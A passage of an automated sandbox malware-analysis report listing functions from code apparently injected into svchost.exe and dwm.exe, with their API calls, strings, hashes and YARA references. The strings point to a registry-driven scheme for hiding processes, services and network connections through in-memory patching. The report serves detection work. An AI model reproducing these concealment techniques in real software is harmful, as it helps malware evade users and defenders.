Instruction ID: 26148cedc7e7393984548b0d27a179502ff655e41e471cbadbe1c26882793d0d
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 5941E632B14A4082EB20DF25E44D39AB7A4F389BD4F584021EE8E97788DF3CC455CB41

Function 000002A66130D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002A66130D6F9
LCMapStringW.KERNEL32 ref: 000002A66130D781

Strings

LCMapStringEx, xrefs: 000002A66130D6DC, 000002A66130D6ED

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 5299850c71e00a34e9ab231a5fc861aac41e51d00e5afb72f0c3f518ed32c545
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 50110B36708BC086DB60CF15B44829AB7A8F7C9F94F584126EE8E53B59DF3CC4548B40

Function 000002A6613094A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002A6613094E8
RaiseException.KERNEL32 ref: 000002A66130952E

Strings

csm, xrefs: 000002A66130951B

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: bd88ddc39b80fbe161f04c61a485dee9a5def588c444f122c90a1622165b6d6c
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 8F113A32608B8082EB618F15E4483597BE8F789F98F1D4220DE8E17B68DF3DC559CB41

Function 000002A66130D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002A66130D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002A66130D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002A66130D681

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: b4c49a4aae0989cb96510c2edbffded8341e8a649ebced7b63add6fe05655295
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 6EF0E221B10780C3EB059B45F80D29433A8AB89FA4F8C5021A94F23B55CF3CC89DCB42

Function 000002A6612DCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002A6612DCBC5

Strings

November, xrefs: 000002A6612DCBA8, 000002A6612DCBB2
October, xrefs: 000002A6612DCBBE

Memory Dump Source

Source File: 00000009.00000002.2984385637.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a6612d0000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 34b657edabca4fb7c16a9ca5f99ee603017589a98796ca4246c539c293f6b05d
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 50E09261F005C593EE049B62F44C2E4622D9F85F40F5D5125D9190B252DF3CC9DEC342

Function 000002A66130D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002A66130D631
TlsSetValue.KERNEL32 ref: 000002A66130D648

Strings

FlsSetValue, xrefs: 000002A66130D61E

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: b14d3d8136249e5ef12ebf06390420993942a240dd072e76d802ddbc2ef96508
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 9DE09261B0064093EF059B50FC0E69433AABB89F95F8C9026E90B27795CF3CC85DC742

Function 000002A661301D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002A661301D9B
HeapAlloc.KERNEL32 ref: 000002A661301DAA
GetProcessHeap.KERNEL32 ref: 000002A661301E1E
HeapFree.KERNEL32 ref: 000002A661301E2C

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 12a56478c837c39c5216bc8345ce5163ad79e49cf0720a9169c88b3f3c9e6f16
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 0D216032B04B8082EA519F59A40C25AF7F4FB85F99F194124DE8E57B14EF7CC54AC741

Function 000002A661301274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002A66130127A
HeapAlloc.KERNEL32 ref: 000002A661301289
GetProcessHeap.KERNEL32 ref: 000002A6613012A3
HeapAlloc.KERNEL32 ref: 000002A6613012B4

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 16ddd67762c4d4c4f8100b4d624632db3f00bd7c2fc12c005352baca9613edce
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 7AE0C9B1B5160087E704EB66D81D3597AE5EB89F61F498024C94A07350DF7D8499C751

Analysis Process: dwm.exePID: 988, Parent PID: 5796COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	90.2%
Signature Coverage:	0%
Total number of Nodes:	102
Total number of Limit Nodes:	16

Executed Functions

Function 000002BAAE291650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002BAAE29165B
HeapAlloc.KERNEL32 ref: 000002BAAE29166A

Part of subcall function 000002BAAE291274: GetProcessHeap.KERNEL32 ref: 000002BAAE29127A
Part of subcall function 000002BAAE291274: HeapAlloc.KERNEL32 ref: 000002BAAE291289
Part of subcall function 000002BAAE291274: GetProcessHeap.KERNEL32 ref: 000002BAAE2912A3
Part of subcall function 000002BAAE291274: HeapAlloc.KERNEL32 ref: 000002BAAE2912B4

RegOpenKeyExW.ADVAPI32 ref: 000002BAAE2916DA
RegOpenKeyExW.ADVAPI32 ref: 000002BAAE291707
RegCloseKey.ADVAPI32 ref: 000002BAAE291721
RegOpenKeyExW.ADVAPI32 ref: 000002BAAE291741
RegCloseKey.ADVAPI32 ref: 000002BAAE29175C
RegOpenKeyExW.ADVAPI32 ref: 000002BAAE29177C
RegCloseKey.ADVAPI32 ref: 000002BAAE291797
RegOpenKeyExW.ADVAPI32 ref: 000002BAAE2917B7
RegCloseKey.ADVAPI32 ref: 000002BAAE2917D2
RegOpenKeyExW.ADVAPI32 ref: 000002BAAE2917F2
RegCloseKey.ADVAPI32 ref: 000002BAAE29180D
RegOpenKeyExW.ADVAPI32 ref: 000002BAAE29182D
RegCloseKey.ADVAPI32 ref: 000002BAAE291848
RegOpenKeyExW.ADVAPI32 ref: 000002BAAE291868
RegCloseKey.ADVAPI32 ref: 000002BAAE291883
RegOpenKeyExW.ADVAPI32 ref: 000002BAAE2918A3
RegCloseKey.ADVAPI32 ref: 000002BAAE2918BE
RegCloseKey.ADVAPI32 ref: 000002BAAE2918C8

Part of subcall function 000002BAAE2912C8: RegQueryInfoKeyW.ADVAPI32 ref: 000002BAAE291326
Part of subcall function 000002BAAE2912C8: GetProcessHeap.KERNEL32 ref: 000002BAAE291334
Part of subcall function 000002BAAE2912C8: HeapAlloc.KERNEL32 ref: 000002BAAE291345
Part of subcall function 000002BAAE2912C8: RegEnumValueW.ADVAPI32 ref: 000002BAAE2913A1
Part of subcall function 000002BAAE2912C8: GetProcessHeap.KERNEL32 ref: 000002BAAE2913E9
Part of subcall function 000002BAAE2912C8: HeapAlloc.KERNEL32 ref: 000002BAAE2913F7
Part of subcall function 000002BAAE2912C8: GetProcessHeap.KERNEL32 ref: 000002BAAE29141B
Part of subcall function 000002BAAE2912C8: HeapFree.KERNEL32 ref: 000002BAAE291429
Part of subcall function 000002BAAE2912C8: lstrlenW.KERNEL32 ref: 000002BAAE291432
Part of subcall function 000002BAAE2912C8: GetProcessHeap.KERNEL32 ref: 000002BAAE291440
Part of subcall function 000002BAAE2912C8: HeapAlloc.KERNEL32 ref: 000002BAAE29144E

Strings

service_names, xrefs: 000002BAAE2917EB
pid, xrefs: 000002BAAE29173A
process_names, xrefs: 000002BAAE291775
tcp_local, xrefs: 000002BAAE291826
SOFTWARE\dialerconfig, xrefs: 000002BAAE2916BA
paths, xrefs: 000002BAAE2917B0
udp, xrefs: 000002BAAE29189C
startup, xrefs: 000002BAAE2916FD
tcp_remote, xrefs: 000002BAAE291861

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 21b5fac50eec92dc7ba075ca9d08b85be9b71529412556fe0f3ca6f510548e4a
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 29714E36710A5085EF209F76E86869D37B4FB8DB88F112121DE8E47B68DF79C858C311

Function 000002BAAE295C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002BAAE295C4B
GetThreadContext.KERNEL32 ref: 000002BAAE295DB5

Part of subcall function 000002BAAE295A40: GetCurrentThreadId.KERNEL32 ref: 000002BAAE295A44

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction ID: 33d3bbc9aeb4fccbf067e535708c3c8336c69ba2819deccc7fd5815dae861302
Opcode Fuzzy Hash: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction Fuzzy Hash: 1AD18C76209B8882DE709B19E4A435A77B0F78CB88F201116EACD47BA5DF3DC955CB21

Function 000002BAAE2951B0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002BAAE295236

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction ID: 9bdee4946ec74bec75f0b6541dbcf37b4999663bd50239ac5b093c07517b6d87
Opcode Fuzzy Hash: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction Fuzzy Hash: B902CC32219B8086EB60DB55F49435AB7B0F3C8794F205115EACE87B69DF7DC858CB21

Function 000002BAAE293878 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000002BAAE293886
GetCurrentProcess.KERNEL32 ref: 000002BAAE2938B4
VirtualProtectEx.KERNEL32 ref: 000002BAAE2938D6
GetCurrentProcess.KERNEL32 ref: 000002BAAE2938F4
VirtualProtectEx.KERNEL32 ref: 000002BAAE293915

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 270950be87e8fe1fee9dfe0f43182a3e8360f859671996b8491d2433250d5d7c
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 4C110C2A705B4182FF249B11F42836AB7B5F749B84F144029DEC907794EF3EC959C715

Function 000002BAAE293AC0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000002BAAE293B46
VirtualAlloc.KERNEL32 ref: 000002BAAE293B80

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction ID: 5b76ac8afdd510a16c13e8879568d5a943fae58e3714373241059bd6c7fd04fa
Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction Fuzzy Hash: 5231FD22219A4481EE709A15E47835A73B4F38C784F201525E5CE46BA8DF7EC948CB22

Function 000002BAAE293458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002BAAE29347A
PathFindFileNameW.SHLWAPI ref: 000002BAAE293489

Part of subcall function 000002BAAE293930: StrCmpNIW.SHLWAPI ref: 000002BAAE293948

Part of subcall function 000002BAAE293878: GetModuleHandleW.KERNEL32 ref: 000002BAAE293886
Part of subcall function 000002BAAE293878: GetCurrentProcess.KERNEL32 ref: 000002BAAE2938B4
Part of subcall function 000002BAAE293878: VirtualProtectEx.KERNEL32 ref: 000002BAAE2938D6
Part of subcall function 000002BAAE293878: GetCurrentProcess.KERNEL32 ref: 000002BAAE2938F4
Part of subcall function 000002BAAE293878: VirtualProtectEx.KERNEL32 ref: 000002BAAE293915

CreateThread.KERNEL32 ref: 000002BAAE2934D7

Part of subcall function 000002BAAE291EB4: GetCurrentThread.KERNEL32 ref: 000002BAAE291EBF

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: a1dcb7d7700568ba9b6c41d3491288a82564c17ddc00658e20c58dd8303fa50b
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 7211396061060192FF319721A92E35A33F1B75C744F6520299AC686294EF3ACC9CC633

Function 000002BAAE294ED0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000002BAAE294ED4
VirtualProtect.KERNEL32 ref: 000002BAAE294F17
FlushInstructionCache.KERNEL32 ref: 000002BAAE294F2C

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction ID: ad027f71ead85750827d3b3336307486c263ecd9a580d7a943f37b3f65af9904
Opcode Fuzzy Hash: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction Fuzzy Hash: 85F03026218B4480DA70DB15E4A534A77B0E3CC7D4F641111F9CD07B69CF39C588CB11

Function 000002BAAE262908 Relevance: 3.2, APIs: 2, Instructions: 186
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000002BAAE2629AA
LoadLibraryA.KERNELBASE ref: 000002BAAE262A31

Memory Dump Source

Source File: 0000000A.00000002.3060708588.000002BAAE260000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae260000_dwm.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 6dc81eecc31e260496d137b5d0662306798a873fb1793c76fcbd01bb7787a53d
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 5561333370125183EF68CF19D46876DF3A5FB28B94F248221DA9A07785DB38E856C722

Function 000002BAAE291C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002BAAE291650: GetProcessHeap.KERNEL32 ref: 000002BAAE29165B
Part of subcall function 000002BAAE291650: HeapAlloc.KERNEL32 ref: 000002BAAE29166A
Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE2916DA
Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE291707
Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE291721
Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE291741
Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE29175C
Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE29177C
Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE291797
Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE2917B7
Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE2917D2
Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE2917F2

Sleep.KERNEL32 ref: 000002BAAE291C43
SleepEx.KERNELBASE ref: 000002BAAE291C49

Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE29180D
Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE29182D
Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE291848
Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE291868
Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE291883
Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE2918A3
Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE2918BE
Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE2918C8

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 4bfc8e8a26307a2eafaf89a01b96bc9c681df76f80ae4d9888236671a120edbf
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 3B31E32520060191FF549F37D96935A33B5AB4CBC0F366031DED987696DF25CC69C272

Function 000002BAAED82908 Relevance: 1.4, APIs: 1, Instructions: 186
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000002BAAED829AA

Memory Dump Source

Source File: 0000000A.00000002.3065262959.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baaed80000_dwm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: d68129767a834a96e50de18453de40ab19bf911d8bbe2b168271e1e7c2de839b
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: E261347270229187EB68CF1AD45877DB3B5FB24B94F648021DA9D07789DB38E853C722

Non-executed Functions

Function 000002BAAE292CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002BAAE292D80
lstrlenW.KERNEL32 ref: 000002BAAE292FBA

Part of subcall function 000002BAAE291A14: OpenProcess.KERNEL32 ref: 000002BAAE291A3A
Part of subcall function 000002BAAE291A14: K32GetModuleFileNameExW.KERNEL32 ref: 000002BAAE291A58
Part of subcall function 000002BAAE291A14: PathFindFileNameW.SHLWAPI ref: 000002BAAE291A67
Part of subcall function 000002BAAE291A14: lstrlenW.KERNEL32 ref: 000002BAAE291A73
Part of subcall function 000002BAAE291A14: StrCpyW.SHLWAPI ref: 000002BAAE291A86
Part of subcall function 000002BAAE291A14: CloseHandle.KERNEL32 ref: 000002BAAE291A94

GetProcAddress.KERNEL32 ref: 000002BAAE292D95

Part of subcall function 000002BAAE291554: StrCmpIW.SHLWAPI ref: 000002BAAE291585

Part of subcall function 000002BAAE293930: StrCmpNIW.SHLWAPI ref: 000002BAAE293948

StrCmpNIW.SHLWAPI ref: 000002BAAE292DD8
lstrlenW.KERNEL32 ref: 000002BAAE292F00

Strings

\Device\Nsi, xrefs: 000002BAAE292DCB
ntdll.dll, xrefs: 000002BAAE292D79
NtQueryObject, xrefs: 000002BAAE292D8B

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 95cab264222ae3322cd4bccd663f917f2f02c5f6d4a78e03958826a915f3b661
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: B3B1B032210A5082EF688F29E4687A973B4FB4CB84F646016EEC953794DF76CD98C361

Function 000002BAAE297E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002BAAE297E8C
RtlCaptureContext.NTDLL ref: 000002BAAE297EB9
RtlLookupFunctionEntry.NTDLL ref: 000002BAAE297ED3
RtlVirtualUnwind.NTDLL ref: 000002BAAE297F14
IsDebuggerPresent.KERNEL32 ref: 000002BAAE297F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000002BAAE297F89
UnhandledExceptionFilter.KERNEL32 ref: 000002BAAE297F94

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: d1091acc2dd2400463f12bd56833495dc32d8c2ad57b8a25767a2abce1793302
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 04317072204B8086EF608F60E8643ED7371F788744F54442ADA8D47B98EF38C94CC720

Function 000002BAAE29B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002BAAE29B585
RtlLookupFunctionEntry.NTDLL ref: 000002BAAE29B59D
RtlVirtualUnwind.NTDLL ref: 000002BAAE29B5D8
IsDebuggerPresent.KERNEL32 ref: 000002BAAE29B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002BAAE29B61B
UnhandledExceptionFilter.KERNEL32 ref: 000002BAAE29B626

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 2de0741a9e7c44065691814522c5d4c79a5c3333bff1a02a6aba22cbf1d6c8aa
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 5A316D32204F8086EB60CF25E85439E73B4F789B58F640526EADD43BA9DF38C959CB11

Function 000002BAAE29FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002BAAE29FF67
